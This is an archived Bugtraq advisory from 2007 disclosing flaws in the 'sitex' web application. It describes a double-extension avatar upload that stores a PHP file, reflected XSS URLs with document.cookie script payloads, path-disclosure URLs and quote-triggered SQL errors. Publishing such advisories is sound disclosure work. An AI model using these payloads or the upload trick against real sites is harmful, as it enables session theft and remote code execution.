| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | sitex multiple vulnerabilities |
| From: | none@none.com |
| Date: | 23 Feb 2007 19:49:05 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
global risk:critical upload vulnerability: in user profile upload an avatar with a double extension like : file.php.jpg once it's done,you gone get an error like:Fatal error: Call to undefined function imagedestroy() in /. but the last extension (jpg) will be removed by the script, and stored in : /content/avatars has ramdom_numberfile.php xss get : /sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script> /sitex/search.php?search=<script>alert(document.cookie)</script> xss via mysql error: /sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script> /calendar_events.php?page='"><script>alert(document.cookie)</script> full path disclosure: /sitex/calendar.php?sxMonth[]=1 /sitex/calendar.php?sxMonth=1&sxYear[]=2007 /calendar_events.php?page[]=1 multiples errors sql : just add a ' on any var .. or on any fields ( like in forum,search,...etc ) regards laurent gaffié |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Call for Paper - SyScan'07, Thomas Lim |
|---|---|
| Next by Date: | Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr), Stan Bubrouski |
| Previous by Thread: | Call for Paper - SyScan'07, Thomas Lim |
| Next by Thread: | SQLiteManager v1.2.0 Multiple Vulnerabilities, simon . itsecurity |
| Indexes: | [Date] [Thread] [Top] [All Lists] |